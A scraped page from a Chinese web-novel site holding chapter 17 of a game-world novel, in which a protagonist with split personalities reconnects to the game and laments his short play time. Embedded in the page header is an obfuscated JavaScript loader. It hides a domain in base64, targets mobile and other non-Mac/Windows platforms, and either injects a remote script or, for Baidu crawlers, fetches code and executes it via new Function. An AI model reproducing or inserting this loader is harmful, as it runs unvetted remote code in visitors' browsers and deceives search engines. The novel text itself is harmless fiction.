98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2Rqa2JjamtzYmRzdnYuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

第十七章:扑朔迷离(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

【您已紧急断开连接,请选择是否重连。】

“是的。”

【重连开始……】

【连接完毕,正在读取角色信息】

【欢迎回来,守序善良的默,即将载入无罪之界,祝您晚安。】

当墨檀回过神来的时候,他发现自己并没有在随便哪个荒郊野岭被系统刷新出来,而是正躺在一张干净松软的床上,周围还弥漫着淡淡的香气。

当然,并非他误入了某位深闺待嫁少女的闺房,尽管诸如此类的狗血桥段依然频繁的出现在小说、动画以及大量影视作品中,坚定而执着地散发着降智的恶臭,但至少在无罪之界以及四重分裂(划掉)里并不会出现……请诸位放心。

“看来这里并不是之前的那片战场。”墨檀翻身坐起,稍微打量了一下房间内的环境,喃喃道:“还真是说掉线就掉线啊,幸亏当时没有人注意到,不然天知道会出现什么后果……”

事情是这样的,就在不久前,当墨檀与双叶在公共空间达成了某个约定后,便在对方还没有反应过来的时候瞬间下线,然后费了很大力气强行将自己的人格进行转换,以最快速度登陆了黑梵的角色。

毕竟虽然他已经有九成把握不会再引起双叶的怀疑了,但也不愿意承担任何额外的风险,如果双叶在两人接触完之后心中依然抱有疑虑,然后立刻在游戏里登陆后发现黑梵并不在,有可能依然会让她保持警惕……

所以墨檀打算尽快上线回到营地,倘若收到了双叶信息的话就秒回,差不多也就能够彻底让对方放心了。

在这个游戏中玩家们是看不到自己好友是否在线的,想知道对方有没有在进行游戏,只有当面见到或者发消息确认这两个办法。

但这次墨檀却是有些多虑了,在收到角色‘檀莫’的好友申请后,双叶已经彻底打消了之前的怀疑,只当自己有些想太多,并且已经把注意力放到了那个与她刚见过面的‘black’身上,之后压根就没有再登录。

墨檀那套‘被网络上忽然出现了大量虚假资料所吸引了注意,随即稍微调查了一下’的言论毫无逻辑漏洞,成功地让双叶觉得后续那一连串事件与游戏中认识的某牧师毫无关联。

至少短时间内,主导权已经确定在他手里了。

当然,至于双叶怎么想,那就都无所谓了……

一步错,步步错的道理谁都懂。

然后墨檀在回到军营进行了一番简单的确认后又给双叶发了条消息,主要内容大概就是抱怨给魔晶灯充能很枯燥,以及一些关于魔力与信仰感知的心得,确定她真没在线后就跟奈德他们打了个招呼离开驻地了,准备去一趟教会那边看看有什么技能可学。

结果在路上……犯病了。

于是,掉线……

重新登录游戏,守序善良的默闪亮登场~

这大概就是之前的全过程了。

当然对墨檀(这会儿的)来说,是件好事,因为他很关心当时的林精商队以及作为护卫的伏地龙佣兵团后来到底怎么样了。

不过前半句可以说是废话,因为无论墨檀以哪种人格登录游戏,那个与当前性格相符的角色无疑都会是他最想玩的。

所以说,神经病人快乐多嘛~~

“既然我能出现在这里,那么也就证明这肯定是‘合理’的,至少暂时不用担心危险。”墨檀并没有第一时间离开这里,而是坐在床上托着下巴思考着,毕竟两天过去了,如果之前那些共同作战过的伙伴们遇到了不测,那赶这么几分钟的时间也无济于事,如果大家的处境已经安全,就更不用着急了。

之前就提到过,尽管正直、善良并极具责任感,但【守序善良】的墨檀却并非那种耿直且不爱动脑的类型,性格这玩意儿可不会影响到智商,所以他并没有着急行动,甚至还在想也许过不了多久答案就会主动出现自己面前也说不定……

墨檀这会儿正在思考另一件事。

无论从哪个角度都很重要的事。

自己太弱了!

这里的‘自己’指的可并非现在这个【守序善良】的默,而是真真正正的墨檀自己,无论哪个角色都一样……

不要说跟那些npc们比了,就算是玩家里面墨檀也是相较来说很不给力的那种,并非他玩的不好或者天赋有限,恰恰相反,无论哪个人格所代表的角色都十分具有潜质,但是……

时间少啊!

人家一个角色从晚上七点晚到早上七点,总计有24小时的游戏时间(无误,现实与游戏的时间比为1:2),而墨檀却只有平均起来还不足前者的三分之一,这是他无论是进行任务或者提升等级都会受到巨大的影响,这甚至都不需要来举例说明。

守序善良的默这个角色甚至连续十几章都……咳咳,昨天一整天都没有登录过,而这还仅仅只是一个开始,随着玩家们总游戏时间的增长,这个劣势很快就将呈几何性放大,最终陷入恶性循环。

好吧,就算无罪之界与其它游戏性质不太一样,极端的不确定性或许会让后果没有那么严重,但也依然会对墨檀有着很大的负面影响。

而墨檀的人格分裂症可不是什么主动技能,而是个被动效果,所以也就意味着……

“无解。”墨檀叹了口气,摇头喃喃道:“至少暂时无解。”

此时的他并非在遗憾这种不平等待遇,只是单纯希望自己能够拥有帮助别人的力量,就像同样一次遭遇战,一个普通炮灰与满级英雄兵能起到的作用可谓是天上地下。

无论是信奉春哥能够让敌我双方都满buff原地复活的死亡骑士,还是打不过也能带着小伙伴们群体传送跑路的白胡子老大爷,都比一台只能玩电焊的scv更靠谱吧?

无论处于何种世界观之下,伤害与拯救这种高技术含量的活可都是需要硬性实力作为后盾的。

而墨檀这会儿的实力恐怕还不如一台scv,至少人家还有个电焊呢!

不过尽管自己拥有复数角色的bug配上墨檀这病有着很大的弊端,但却也并非完全没有好处,比如说……

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间